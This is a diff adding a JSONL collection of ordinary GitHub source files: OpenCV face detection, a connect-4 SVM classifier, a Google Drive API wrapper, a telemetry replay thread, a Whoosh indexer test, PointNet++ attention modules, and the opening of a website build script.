diff --git "a/5891.jsonl" "b/5891.jsonl" new file mode 100644--- /dev/null +++ "b/5891.jsonl" @@ -0,0 +1,2158 @@ +{"seq_id":"21304076875","text":"import cv2\nimport sys\n\ntry:\n imagePath = sys.argv[1]\n scaleFactor = float(sys.argv[2])\n # cascPath = sys.argv[2]\n # cascPath = \"/usr/local/Cellar/opencv/3.4.3/share/OpenCV/haarcascades/haarcascade_frontalface_default.xml\"\n cascPath = \"haarcascade_frontalface_default.xml\"\n\n # Create the haar cascade\n faceCascade = cv2.CascadeClassifier(cascPath)\n\n # Read the image\n image = cv2.imread(imagePath)\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n\n\n # Detect faces in the image\n faces = faceCascade.detectMultiScale(\n gray,\n scaleFactor = scaleFactor,\n minNeighbors = 5,\n minSize = (30, 30),\n flags = 0\n )\n\n print(\"Found {0} faces!\".format(len(faces)))\n\n # Draw a rectangle around the faces\n for (x, y, w, h) in faces:\n cv2.rectangle(image, (x, y), (x+w, y+h), (0, 255, 0), 2)\n\n\n cv2.imshow(\"Faces found\", image)\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n \nexcept Exception as e:\n print('Los parámetros que deben enviarse son: \\n(1) el path de la imagen \\n(2) el factor de escala (float).')\n print('Detalle del error: ', e)\n\n\n","repo_name":"paolodoors/face_recognition_ocv","sub_path":"face_detect.py","file_name":"face_detect.py","file_ext":"py","file_size_in_byte":1132,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6820939164","text":"import sklearn, nltk\nfrom sklearn import svm\nfrom sklearn.metrics import accuracy_score\nimport numpy as np\nimport sys\nimport copy\nfp=open('connect-4.data', 'r')\ndata=fp.read().strip().split()\nfp.close()\n\n#Vectorize data.\nGame=[]\nOutcome=[]\nfor x in data:\n\ty = x.split(',')\n\tif y[-1] == 'win':\n\t\tOutcome.append(1)\n\telif y[-1] == 'loss':\n\t\tOutcome.append(-1)\n\telif y[-1] == 'draw':\n\t\tOutcome.append(0)\n\ty = y[:-1]\n\ttemp=[]\n\tfor stuff in y:\n\t\tif stuff == 'x':\n\t\t\ttemp.append(1)\n\t\telif stuff == 'b':\n\t\t\ttemp.append(0)\n\t\telif stuff == 'o':\n\t\t\ttemp.append(-1)\n\tGame.append(temp)\n\n#Vectorization of data complete! 
Game contains feature vectors and Outcome contains the outcomes\nVGame=[[],[],[],[],[],[]]\nVOutcome=[[],[],[],[],[],[]]\nl = len(Game)\nvl=int(l/5)+1\nfor i in range(l):\n\tt=int(i/vl)\n\tx=Game[i]\n\ty=Outcome[i]\n\tVGame[t].append(x)\n\tVOutcome[t].append(y)\n\nclfw = svm.LinearSVC(loss='hinge')\nclfd = svm.LinearSVC(loss='hinge')\nclfl = svm.LinearSVC(loss='hinge')\n\n#create learning sets for 3 classifiers\nfor vpart in range(5):\n\t# print(\"Validating part \"+str(vpart))\n\t#win classifier\n\tgw=[]\n\tow=[]\n\t#draw classifier\n\tgd=[]\n\tod=[]\n\t#loss classifier\n\tgl=[]\n\tol=[]\n\n\t#Extract Test data\n\tPred=[]\n\tOTest=copy.deepcopy(VOutcome[vpart])\n\tGTest=copy.deepcopy(VGame[vpart])\n\t#Create Training sets for 3 classifiers!\n\tfor z in range(5):\n\t\t# print(\"z = \"+str(z))\n\t\tif z == vpart:\n\t\t\tcontinue\n\t\telse:\n\t\t\t# print(len(VGame[z]))\n\t\t\tO=copy.deepcopy(VOutcome[z])\n\t\t\tG=copy.deepcopy(VGame[z])\n\t\t\t# print(str(len(VGame[z]))+\" \"+str(len(G)))\n\t\t\tfor i in range(len(O)):\n\t\t\t\tif O[i] == 1:\n\t\t\t\t\tgw.append(G[i])\n\t\t\t\t\tgd.append(G[i])\n\t\t\t\t\tgl.append(G[i])\n\t\t\t\t\tow.append(1)\n\t\t\t\t\tod.append(0)\n\t\t\t\t\tol.append(0)\n\t\t\t\tif O[i] == 0:\n\t\t\t\t\tgw.append(G[i])\n\t\t\t\t\tgd.append(G[i])\n\t\t\t\t\tgl.append(G[i])\n\t\t\t\t\tow.append(0)\n\t\t\t\t\tod.append(1)\n\t\t\t\t\tol.append(0)\n\t\t\t\tif O[i] == -1:\n\t\t\t\t\tgw.append(G[i])\n\t\t\t\t\tgd.append(G[i])\n\t\t\t\t\tgl.append(G[i])\n\t\t\t\t\tow.append(0)\n\t\t\t\t\tod.append(0)\n\t\t\t\t\tol.append(1)\n\tclfw.fit(gw,ow)\n\tclfd.fit(gd,od)\n\tclfl.fit(gl,ol)\n\t# decision scores ordered [win, draw, loss] so the argmax below maps 0->win, 1->draw, 2->loss\n\tPred1 = clfw.decision_function(GTest)\n\tPred2 = clfd.decision_function(GTest)\n\tPred3 = clfl.decision_function(GTest)\n\tfor x in range(len(Pred1)):\n\t\ttemparr=[]\n\t\ttemparr.append(Pred1[x])\n\t\ttemparr.append(Pred2[x])\n\t\ttemparr.append(Pred3[x])\n\t\t# print(temparr)\n\t\tmaxarg = np.argmax(temparr)\n\t\tif maxarg==0:\n\t\t\tPred.append(1)\n\t\tif maxarg==1:\n\t\t\tPred.append(0)\n\t\tif maxarg==2:\n\t\t\tPred.append(-1)\n\n\taccuracy = accuracy_score(OTest, Pred)\n\tprint(accuracy)\n","repo_name":"divush/MLT-Assignments","sub_path":"A2/Q2/restconnect.py","file_name":"restconnect.py","file_ext":"py","file_size_in_byte":2477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"35498598931","text":"from __future__ import print_function\nimport pickle, io, random, string\nimport os.path\nfrom googleapiclient.discovery import build\nfrom googleapiclient.http import MediaIoBaseDownload, MediaFileUpload\nfrom google_auth_oauthlib.flow import InstalledAppFlow\nfrom google.auth.transport.requests import Request\n\nclass drive:\n def setService(self):\n # change to the subfolder where the credentials (should be) are\n dir = os.getcwd()\n os.chdir(dir + '\\myDrive')\n\n creds = None\n # The file token.pickle stores the user's access and refresh tokens, and is\n # created automatically when the authorization flow completes for the first\n # time.\n if os.path.exists('token.pickle'):\n with open('token.pickle', 'rb') as token:\n creds = pickle.load(token)\n # If there are no (valid) credentials available, let the user log in.\n if not creds or not creds.valid:\n if creds and creds.expired and creds.refresh_token:\n creds.refresh(Request())\n else:\n # get credentials.json\n flow = InstalledAppFlow.from_client_secrets_file(\n 'credentials.json', self.SCOPES)\n creds = flow.run_local_server(port=0)\n\n # Save the 
credentials for the next run\n with open('token.pickle', 'wb') as token:\n pickle.dump(creds, token)\n\n # change back directories\n os.chdir(dir)\n \n return build('drive', 'v3', credentials=creds)\n\n def printLastFiles(self, num=10):\n # Call the Drive v3 API\n results = self.service.files().list(\n pageSize=num, fields=\"nextPageToken, files(id, name)\").execute()\n items = results.get('files', [])\n\n if not items:\n print('No files found.')\n else:\n print('Files:')\n for item in items:\n print(u'{0} ({1})'.format(item['name'], item['id']))\n\n def getFileIdByName(self, fileName):\n query = \"name='\" + fileName + \"'\"\n page_token = None\n while True:\n response = self.service.files().list(q=query,\n spaces='drive',\n fields='nextPageToken, files(id, name)',\n pageToken=page_token).execute()\n for file in response.get('files', []):\n # Process change\n return file.get('id')\n page_token = response.get('nextPageToken', None)\n if page_token is None:\n break\n\n def downloadFileById(self, id, path):\n file_id = str(id)\n request = self.service.files().get_media(fileId=file_id)\n fh = io.FileIO(path + self.randomStringName(6) + self.downloadExtension, 'wb')\n downloader = MediaIoBaseDownload(fh, request)\n done = False\n while done is False:\n status, done = downloader.next_chunk()\n print (\"Download %d%%.\" % int(status.progress() * 100))\n\n # find id of the buffer folder and get the ids of the files inside\n def getFolderIdByName(self, folderName):\n # get the folder id by folder name\n folderQuery = \"mimeType = 'application/vnd.google-apps.folder' and \" +\"name='\" + folderName + \"'\"\n response = self.service.files().list(q=folderQuery,\n spaces='drive',\n fields='nextPageToken, files(id, name)').execute()\n folder = response.get('files', [])[0]\n if not folder:\n print('No folders with name ' + folderName + ' found.')\n else:\n folderID = folder.get('id')\n print('Folder ID: ' + folderID)\n return folderID\n \n def getIdFilesFromFolder(self, folderID):\n # once you have the folder id, get the ids of all the files inside\n folderContentQuery = \"mimeType='image/jpeg' and '\" + folderID +\"' in parents\"\n page_token = None\n id_array = []\n while True:\n response = self.service.files().list(q=folderContentQuery,\n spaces='drive',\n fields='nextPageToken, files(id, name)',\n pageToken=page_token).execute()\n for file in response.get('files', []):\n print ('Found file: %s (%s)' % (file.get('name'), file.get('id')))\n id_array.append(file.get('id'))\n page_token = response.get('nextPageToken', None)\n if page_token is None:\n break\n return id_array\n\n def randomStringName(self, N):\n return ''.join(random.choices(string.ascii_lowercase + string.digits, k=N))\n\n def uploadFile(self, fileToUpload, folderID):\n fileBaseName = os.path.basename(fileToUpload)\n mime = 'image/png'\n if(os.path.splitext(fileBaseName)[1] == '.mp4'):\n mime = 'video/mp4'\n \n file_metadata = {'name': fileBaseName,\n 'parents' : [folderID]}\n media = MediaFileUpload(fileToUpload, mimetype=mime)\n file = self.service.files().create(body=file_metadata,\n media_body=media,\n fields='id').execute()\n print ('Uploaded file ID: %s' % file.get('id'))\n\n def deleteFileById(self, file_id):\n try:\n self.service.files().delete(fileId=file_id).execute()\n except:\n print(\"Could not delete file\")\n \n def __init__(self):\n # If modifying these scopes, delete the file token.pickle.\n self.SCOPES = ['https://www.googleapis.com/auth/drive']\n self.downloadExtension = \".jpg\"\n self.service = 
self.setService()\n","repo_name":"angelolmg/python-auto-painter","sub_path":"myDrive/gdriveservice.py","file_name":"gdriveservice.py","file_ext":"py","file_size_in_byte":5924,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"}
+{"seq_id":"10032718542","text":"import threading\nimport time\n\nEVENT_TYPES = [\"accelx\",\"accely\",\"accelz\",\"gyrox\",\"gyroy\",\"gyroz\",\"gps\",\"altitude\",\"temp\",\"battery\"]\n\ndef timeMs():\n\treturn int(time.time()*1000)\n\nclass ReplayThread(threading.Thread):\n\tdef __init__(self, teleManager, looped):\n\t\tsuper(ReplayThread, self).__init__(daemon=True)\n\t\tself.looped = looped\n\t\tself.telemetry = teleManager\n\n\tdef newMessages(self,mint,maxt):\n\t\tevents = []\n\t\tfor val in EVENT_TYPES:\n\t\t\tevents += self.telemetry.serviceRequest(val,mint,maxt)\n\t\treturn events\n\n\tdef doReplay(self, startTime):\n\t\tlastTime = -float(\"inf\")\n\t\tendTime = self.telemetry.maxTime()\n\t\twhile True:\n\t\t\ttime.sleep(0.01) # Run every ~10 ms\n\t\t\tnewTime = timeMs()-startTime\n\t\t\tself.telemetry.updateHistoryMask(None,newTime)\n\t\t\t# fetch only the events between the last tick and the current replay time\n\t\t\tnewData = self.newMessages(lastTime+1,newTime)\n\t\t\t# print(\"{:d} new data points for time {:d}\".format(len(newData),newTime))\n\t\t\tself.telemetry.socket.emit(\"telemetry\",[e.data for e in newData])\n\t\t\tlastTime = newTime\n\t\t\tif newTime > endTime:\n\t\t\t\tbreak\n\n\tdef run(self):\n\t\tself.telemetry.updateHistoryMask(None,-float('inf'))\n\t\twhile True:\n\t\t\ttime.sleep(5)\n\t\t\tself.doReplay(timeMs())\n\t\t\tif not self.looped:\n\t\t\t\tbreak","repo_name":"rensselaer-rocket-society/TelemetryUnit","sub_path":"Ground Station/LiveReplay.py","file_name":"LiveReplay.py","file_ext":"py","file_size_in_byte":1163,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"33863850791","text":"\"\"\"Tests for yahoo_dataset_indexer.\"\"\"\n\nimport yahoo_dataset_indexer\nimport unittest\nfrom Whoosh import loadIndex, loadCollector, loadQueryParser\nfrom whoosh.fields import Schema, TEXT\nimport os\nfrom whoosh.analysis import StemmingAnalyzer\n\n\nclass YahooDatasetIndexerTest(unittest.TestCase):\n\n def test_create_index(self):\n stem_analyzer = StemmingAnalyzer()\n test_folder_to_index = 'test-folder'\n test_index_name = 'test-index'\n if not os.path.exists(test_folder_to_index):\n os.mkdir(test_folder_to_index)\n\n # Index 1 question.\n ofile = open(test_folder_to_index + '/question_indexer_test.xml', 'w')\n ofile.write(\n '432470 Why are yawns contagious?\\\n When people yawn, you see that other people in the room yawn, too. 
Why is that?\\\n When your body ')\n ofile.close()\n\n yahoo_dataset_indexer.IndexYahooQuestionsWithWhoosh(test_folder_to_index,\n test_index_name)\n questions_index, questions_searcher = loadIndex(test_index_name,\n test_index_name)\n # Check the schema.\n expected_schema = Schema(question_tokens=TEXT(analyzer=stem_analyzer,\n stored=False,\n phrase=False),\n question_text=TEXT(analyzer=stem_analyzer,\n stored=True,\n phrase=False),\n answers=TEXT(analyzer=stem_analyzer,\n stored=False,\n phrase=False))\n self.assertEqual(expected_schema, questions_index.schema)\n # Check the number of documents.\n self.assertEqual(1, questions_index.doc_count())\n # Check the number of terms in question and answer fields.\n expected_question_terms = ['contagi', 'yawn']\n i = 0\n for question_terms_tuple in questions_index.reader().iter_field('question_tokens'):\n self.assertEqual(question_terms_tuple[0], expected_question_terms[i])\n i += 1\n expected_answer_terms = ['bodi']\n i = 0\n for answer_terms_tuple in questions_index.reader().iter_field('answers'):\n self.assertEqual(answer_terms_tuple[0], expected_answer_terms[i])\n i += 1\n\n def test_search_index(self):\n pass\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"vmanisha/QueryExpansion","sub_path":"questions/yahoo_dataset_indexer_test.py","file_name":"yahoo_dataset_indexer_test.py","file_ext":"py","file_size_in_byte":2484,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"27628118830","text":"import torch\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F\r\n\r\nfrom modules.linear_attention import LinearAttention\r\n\r\nclass Self_Attention(nn.Module):\r\n def __init__(self,\r\n d_model,\r\n nhead,\r\n attention='linear'):\r\n super(Self_Attention, self).__init__()\r\n\r\n self.dim = d_model // nhead\r\n self.nhead = nhead\r\n\r\n # position encoding\r\n self.pos_mlp = nn.Sequential(\r\n nn.Linear(3, d_model),\r\n nn.ReLU(),\r\n nn.Linear(d_model, d_model)\r\n )\r\n\r\n # multi-head attention\r\n self.q_proj = nn.Linear(d_model, d_model, bias=False)\r\n self.k_proj = nn.Linear(d_model, d_model, bias=False)\r\n self.v_proj = nn.Linear(d_model, d_model, bias=False)\r\n self.attention = LinearAttention()\r\n self.merge = nn.Linear(d_model, d_model, bias=False)\r\n\r\n # feed-forward network\r\n self.mlp = nn.Sequential(\r\n nn.Linear(d_model*2, d_model*2, bias=False),\r\n nn.ReLU(True),\r\n nn.Linear(d_model*2, d_model, bias=False),\r\n )\r\n\r\n # norm and dropout\r\n self.norm1 = nn.LayerNorm(d_model)\r\n self.norm2 = nn.LayerNorm(d_model)\r\n\r\n def forward(self, feat, xyz, mask=None):\r\n \"\"\"\r\n Args:\r\n feat (torch.Tensor): [B, C, N]\r\n xyz (torch.Tensor): [B, N, 3]\r\n mask (torch.Tensor): [B, N] (optional)\r\n \"\"\"\r\n bs = feat.size(0)\r\n feat = feat.permute(0, 2, 1)\r\n feat_pos = feat + self.pos_mlp(xyz)\r\n\r\n # multi-head attention\r\n query = self.q_proj(feat_pos).view(bs, -1, self.nhead, self.dim) # [B, N, (H, D)]\r\n key = self.k_proj(feat_pos).view(bs, -1, self.nhead, self.dim) # [B, N, (H, D)]\r\n value = self.v_proj(feat_pos).view(bs, -1, self.nhead, self.dim) # [B, N, (H, D)]\r\n\r\n message = self.attention(query, key, value, q_mask=mask, kv_mask=mask) # [B, N, (H, D)]\r\n message = self.merge(message.view(bs, -1, self.nhead*self.dim)) # [B, N, C=H*D]\r\n message = self.norm1(message) # [B, N, C=H*D]\r\n\r\n # feed-forward network\r\n message = self.mlp(torch.cat([feat, message], dim=2)) # [B, N, C=H*D]\r\n message = 
self.norm2(message) # [B, N, C=H*D]\r\n\r\n return (feat + message).permute(0, 2, 1) # [B, C, N]\r\n\r\ndef farthest_point_sample(xyz, npoint):\r\n \"\"\"\r\n Input:\r\n xyz: pointcloud data, [B, N, 3]\r\n npoint: number of samples\r\n Return:\r\n centroids: sampled pointcloud index, [B, npoint]\r\n \"\"\"\r\n device = xyz.device\r\n B, N, C = xyz.shape\r\n centroids = torch.zeros(B, npoint, dtype=torch.long).to(device)\r\n distance = torch.ones(B, N).to(device) * 1e10\r\n farthest = torch.randint(0, N, (B,), dtype=torch.long).to(device)\r\n batch_indices = torch.arange(B, dtype=torch.long).to(device)\r\n for i in range(npoint):\r\n centroids[:, i] = farthest\r\n centroid = xyz[batch_indices, farthest, :].view(B, 1, 3)\r\n dist = torch.sum((xyz - centroid) ** 2, -1)\r\n mask = dist < distance\r\n distance[mask] = dist[mask]\r\n farthest = torch.max(distance, -1)[1]\r\n return centroids\r\n\r\ndef random_point_sample(xyz, npoint):\r\n \"\"\"\r\n Input:\r\n xyz: pointcloud data, [B, N, 3]\r\n npoint: number of samples\r\n Return:\r\n centroids: random sampled pointcloud index, [B, npoint]\r\n \"\"\"\r\n device = xyz.device\r\n centroids = torch.arange(npoint, dtype=torch.long).to(device).repeat(xyz.size(0), 1)\r\n return centroids\r\n\r\ndef index_points(points, idx):\r\n \"\"\"\r\n\r\n Input:\r\n points: input points data, [B, N, C]\r\n idx: sample index data, [B, S]\r\n Return:\r\n new_points:, indexed points data, [B, S, C]\r\n \"\"\"\r\n device = points.device\r\n B = points.shape[0]\r\n view_shape = list(idx.shape)\r\n view_shape[1:] = [1] * (len(view_shape) - 1)\r\n repeat_shape = list(idx.shape)\r\n repeat_shape[0] = 1\r\n batch_indices = torch.arange(B, dtype=torch.long).to(device).view(view_shape).repeat(repeat_shape)\r\n new_points = points[batch_indices, idx, :]\r\n return new_points\r\n\r\ndef square_distance(src, dst):\r\n \"\"\"\r\n Calculate Euclid distance between each two points.\r\n\r\n src^T * dst = xn * xm + yn * ym + zn * zm;\r\n sum(src^2, dim=-1) = xn*xn + yn*yn + zn*zn;\r\n sum(dst^2, dim=-1) = xm*xm + ym*ym + zm*zm;\r\n dist = (xn - xm)^2 + (yn - ym)^2 + (zn - zm)^2\r\n = sum(src**2,dim=-1)+sum(dst**2,dim=-1)-2*src^T*dst\r\n\r\n Input:\r\n src: source points, [B, N, C]\r\n dst: target points, [B, M, C]\r\n Output:\r\n dist: per-point square distance, [B, N, M]\r\n \"\"\"\r\n B, N, _ = src.shape\r\n _, M, _ = dst.shape\r\n dist = -2 * torch.matmul(src, dst.permute(0, 2, 1))\r\n dist += torch.sum(src ** 2, -1).view(B, N, 1)\r\n dist += torch.sum(dst ** 2, -1).view(B, 1, M)\r\n return dist\r\n\r\ndef topk(input, k, dim=None, largest=True, sorted=True):\r\n if dim is None:\r\n dim = -1\r\n if dim < 0:\r\n dim += input.ndim\r\n \r\n transpose_dims = [i for i in range(input.ndim)]\r\n transpose_dims[0] = dim\r\n transpose_dims[dim] = 0\r\n input = input.permute(transpose_dims)\r\n index = torch.argsort(input, dim=0, descending=largest)\r\n indices = index[:k]\r\n indices = indices.permute(transpose_dims)\r\n return [None, indices]\r\n\r\ndef knn_point(nsample, xyz, new_xyz):\r\n \"\"\"\r\n Input:\r\n nsample: max sample number in local region\r\n xyz: all points, [B, N, C]\r\n new_xyz: query points, [B, S, C]\r\n Return:\r\n group_idx: grouped points index, [B, S, nsample]\r\n \"\"\"\r\n sqrdists = square_distance(new_xyz, xyz)\r\n _, group_idx = topk(sqrdists, nsample, dim = -1, largest=False, sorted=False)\r\n return group_idx\r\n\r\ndef query_ball_point(radius, nsample, xyz, new_xyz):\r\n \"\"\"\r\n Input:\r\n radius: local region radius\r\n nsample: max sample number 
in local region\r\n xyz: all points, [B, N, 3]\r\n new_xyz: query points, [B, S, 3]\r\n Return:\r\n group_idx: grouped points index, [B, S, nsample]\r\n \"\"\"\r\n device = xyz.device\r\n B, N, C = xyz.shape\r\n _, S, _ = new_xyz.shape\r\n\r\n group_idx = torch.arange(N, dtype=torch.long).to(device).view(1, 1, N).repeat(B, S, 1)\r\n\r\n sqrdists = square_distance(new_xyz, xyz)\r\n group_idx[sqrdists > radius ** 2] = N\r\n group_idx = group_idx.sort(dim=-1)[0][:, :, :nsample]\r\n group_first = group_idx[:, :, 0].view(B, S, 1).repeat([1, 1, nsample])\r\n mask = group_idx == N\r\n group_idx[mask] = group_first[mask]\r\n return group_idx\r\n\r\ndef sample_and_group_edge(npoint, radius, nsample, xyz, points, sampling, numpoints, returnfps=False, use_knn=False):\r\n \"\"\"\r\n Input:\r\n npoint:\r\n radius:\r\n nsample:\r\n xyz: input points position data, [B, N, 3]\r\n points: input points data, [B, N, D]\r\n Return:\r\n new_xyz: sampled points position data, [B, npoint, nsample, 3]\r\n new_points: sampled points data, [B, npoint, nsample, 3+D]\r\n \"\"\"\r\n B, N, C = xyz.shape\r\n S = numpoints\r\n\r\n if sampling == \"FPS\":\r\n fps_idx = farthest_point_sample(xyz, numpoints) # [B, numpoints]\r\n elif sampling == \"RANDOM\":\r\n fps_idx = random_point_sample(xyz, numpoints) # [B, numpoints]\r\n\r\n new_xyz = index_points(xyz, fps_idx) # B x S x 3\r\n \r\n if use_knn:\r\n idx = knn_point(nsample, xyz, new_xyz)\r\n else:\r\n idx = query_ball_point(radius, nsample, xyz, new_xyz) # B x S x K\r\n\r\n grouped_xyz = index_points(xyz, idx) # B x S x k x 3\r\n grouped_xyz_norm = grouped_xyz - new_xyz.view(B, S, 1, C) # B x S x k x 3\r\n\r\n if points is not None:\r\n # points: B x N x D\r\n # fps_idx: B x S\r\n # center_points: B x S x D\r\n center_points = index_points(points, fps_idx) # B x S x D\r\n grouped_points = index_points(points, idx)\r\n\r\n new_points = torch.cat([grouped_xyz_norm, \r\n center_points.unsqueeze(2).repeat([1, 1, nsample, 1]),\r\n grouped_points-center_points.unsqueeze(2)],\r\n dim=-1)\r\n else:\r\n new_points = grouped_xyz_norm\r\n if returnfps:\r\n return new_xyz, new_points, grouped_xyz, fps_idx\r\n else:\r\n return new_xyz, new_points\r\n\r\ndef sample_and_group_all(xyz, points):\r\n \"\"\"\r\n Input:\r\n xyz: input points position data, [B, N, 3]\r\n points: input points data, [B, N, D]\r\n Return:\r\n new_xyz: sampled points position data, [B, 1, 3]\r\n new_points: sampled points data, [B, 1, N, 3+D]\r\n \"\"\"\r\n device = xyz.device\r\n B, N, C = xyz.shape\r\n new_xyz = torch.zeros(B, 1, C).to(device)\r\n grouped_xyz = xyz.view(B, 1, N, C)\r\n if points is not None:\r\n new_points = torch.cat([grouped_xyz, points.view(B, 1, N, -1)], dim=-1)\r\n else:\r\n new_points = grouped_xyz\r\n return new_xyz, new_points\r\n\r\nclass PointNetSetAbstractionEdgeSA(nn.Module):\r\n def __init__(self, npoint, radius, nsample, mlp, sampling, use_xyz=True, group_all=False, use_knn=False):\r\n super(PointNetSetAbstractionEdgeSA, self).__init__()\r\n self.npoint = npoint\r\n self.radius = radius\r\n self.nsample = nsample\r\n self.use_xyz = use_xyz\r\n self.sampling = sampling\r\n self.use_knn = use_knn\r\n\r\n self.mlp_convs = nn.ModuleList()\r\n self.mlp_bns = nn.ModuleList()\r\n\r\n if self.use_xyz:\r\n mlp[0] += 3\r\n\r\n last_channel = mlp[0]\r\n for out_channel in mlp[1:]:\r\n self.mlp_convs.append(nn.Conv2d(last_channel, out_channel, 1))\r\n self.mlp_bns.append(nn.BatchNorm2d(out_channel))\r\n last_channel = out_channel\r\n self.group_all = group_all\r\n self.self_attention = 
Self_Attention(last_channel, 2, 'linear')\r\n\r\n def forward(self, xyz, points, numpoints):\r\n \"\"\"\r\n Input:\r\n xyz: input points position data, [B, N, 3]\r\n points: input points data, [B, D, N]\r\n Return:\r\n new_xyz: sampled points position data, [B, S, 3]\r\n new_points_concat: sample points feature data, [B, D', S]\r\n \"\"\"\r\n # xyz = xyz.permute(0, 2, 1) # le\r\n if points is not None:\r\n points = points.permute(0, 2, 1) # BxNxD\r\n\r\n if self.group_all:\r\n new_xyz, new_points = sample_and_group_all(xyz, points)\r\n else:\r\n new_xyz, new_points = sample_and_group_edge(self.npoint, self.radius, self.nsample, xyz, points, self.sampling, numpoints, False, self.use_knn)\r\n\r\n new_points = new_points.permute(0, 3, 1, 2) # [B, D, numpoints, nsample]\r\n \r\n for i, conv in enumerate(self.mlp_convs):\r\n bn = self.mlp_bns[i]\r\n new_points = F.relu(bn(conv(new_points)))\r\n\r\n new_points = torch.max(new_points, 3)[0] # B x D x numpoints\r\n\r\n new_points = self.self_attention(new_points, new_xyz)\r\n return new_xyz, new_points\r\n\r\nclass FP_SA(nn.Module):\r\n def __init__(self,\r\n last_channel,\r\n feat1_dim, # B x C1 x N\r\n feat2_dim, # B x C2 x S\r\n d_model,\r\n out_dim,\r\n nhead,\r\n attention='linear'):\r\n super(FP_SA, self).__init__()\r\n\r\n self.dim = d_model // nhead\r\n self.nhead = nhead\r\n\r\n # position encoding\r\n # self.pos_mlp1 = nn.Sequential(\r\n # nn.Linear(3, d_model),\r\n # nn.ReLU(),\r\n # nn.Linear(d_model, feat1_dim)\r\n # )\r\n\r\n self.pos_mlp2 = nn.Sequential(\r\n nn.Linear(3, d_model),\r\n nn.ReLU(),\r\n nn.Linear(d_model, feat2_dim)\r\n )\r\n\r\n # multi-head attention\r\n self.q_proj = nn.Linear(feat1_dim, d_model, bias=False) # feat1\r\n self.k_proj = nn.Linear(feat2_dim, d_model, bias=False) # feat2\r\n self.v_proj = nn.Linear(feat2_dim, d_model, bias=False) # feat2\r\n self.attention = LinearAttention()\r\n self.merge = nn.Linear(d_model, d_model, bias=False)\r\n\r\n # feed-forward network\r\n self.mlp = nn.Sequential(\r\n nn.Linear(feat1_dim+d_model, d_model*2, bias=False),\r\n nn.ReLU(True),\r\n nn.Linear(d_model*2, out_dim, bias=False),\r\n )\r\n\r\n # norm and dropout\r\n self.norm1 = nn.LayerNorm(d_model)\r\n self.norm2 = nn.LayerNorm(out_dim)\r\n\r\n def forward(self, feat1, xyz1, feat2, xyz2, mask=None):\r\n \"\"\"\r\n Args:\r\n feat1 (torch.Tensor): [B, C1, N]\r\n xyz1 (torch.Tensor): [B, N, 3]\r\n feat2 (torch.Tensor): [B, C2, S]\r\n xyz2 (torch.Tensor): [B, S, 3]\r\n mask (torch.Tensor): [B, N] (optional)\r\n \"\"\"\r\n bs = feat1.size(0)\r\n\r\n feat1 = feat1.permute(0, 2, 1) # [B, N, C1]\r\n feat2 = feat2.permute(0, 2, 1) # [B, S, C2]\r\n\r\n # feat1 = feat1 + self.pos_mlp1(xyz1)\r\n feat2_pos = feat2 + self.pos_mlp2(xyz2)\r\n\r\n # multi-head attention\r\n query = self.q_proj(feat1).view(bs, -1, self.nhead, self.dim) # [B, N, (H, D)]\r\n key = self.k_proj(feat2).view(bs, -1, self.nhead, self.dim) # [B, N, (H, D)]\r\n value = self.v_proj(feat2_pos).view(bs, -1, self.nhead, self.dim) # [B, N, (H, D)]\r\n\r\n message = self.attention(query, key, value, q_mask=None, kv_mask=None) # [B, N, (H, D)]\r\n message = self.merge(message.view(bs, -1, self.nhead*self.dim)) # [B, N, C=H*D]\r\n message = self.norm1(message) # [B, N, C=H*D]\r\n\r\n # feed-forward network\r\n message = self.mlp(torch.cat([feat1, message], dim=2)) # [B, N, C=H*D]\r\n message = self.norm2(message)\r\n\r\n return message.permute(0, 2, 1) # [B, C, N]\r\n\r\nclass PointNetFeaturePropagationSA(nn.Module):\r\n def __init__(self, mlp, mlp_inte):\r\n 
super(PointNetFeaturePropagationSA, self).__init__()\r\n self.mlp_convs = nn.ModuleList()\r\n self.mlp_bns = nn.ModuleList()\r\n \r\n last_channel = mlp[0]\r\n for out_channel in mlp[1:]:\r\n self.mlp_convs.append(nn.Conv1d(last_channel, out_channel, 1))\r\n self.mlp_bns.append(nn.BatchNorm1d(out_channel))\r\n last_channel = out_channel\r\n\r\n self.interpolation = FP_SA(\r\n last_channel=mlp_inte[0],\r\n feat1_dim=mlp_inte[1],\r\n feat2_dim=mlp_inte[2],\r\n d_model=mlp_inte[3],\r\n out_dim=mlp_inte[4],\r\n nhead=2,\r\n attention='linear')\r\n\r\n def forward(self, xyz1, xyz2, points1, points2):\r\n \"\"\"\r\n Input:\r\n xyz1: input points position data, [B, N, C]\r\n xyz2: sampled input points position data, [B, S, C]\r\n points1: input points data, [B, D, N]\r\n points2: input points data, [B, D, S]\r\n Return:\r\n new_points: upsampled points data, [B, D', N]\r\n \"\"\"\r\n B, N, C = xyz1.shape\r\n \r\n inte_points1 = self.interpolation(points1, xyz1, points2, xyz2) # [B, C2, N]\r\n return inte_points1","repo_name":"fpthink/STNet","sub_path":"modules/pointnet2_utils.py","file_name":"pointnet2_utils.py","file_ext":"py","file_size_in_byte":15749,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"21"} +{"seq_id":"10958751042","text":"from distutils.dir_util import copy_tree\n\nimport markdown2\nimport argparse\nimport datetime\nimport shutil\nimport json\nimport os\n\n'''\nExpects the working directory to be setup like the following...\n\n WorkingDirectory:\n EvanMPutnam.github.io - Build files (Git repo)\n WebsiteSRC - Src files (Git repo)\n\n1. Converts the input markdown file to html and adds an entry to the json object.\n2. Moves any new images in the images folder over to the src folder.\n3. Rebuilds the application with the new images and json file.\n4. Pushes off to github with a commit message detailing article name.\n'''\n\nBUILD_DIR = \"../EvanMPutnam.github.io\"\nBASE_DIR = os.getcwd()\n\n# ###########################################################\n# Description: Converts a markdown file to html and\n# returns it as a string.\n# ###########################################################\ndef convert_file_to_html(file_path):\n str_to_read = \"\"\n with open(file_path) as fle:\n str_to_read = fle.read()\n str_to_write = markdown2.markdown(str_to_read, extras = [\"fenced-code-blocks\"])\n print(str_to_write)\n 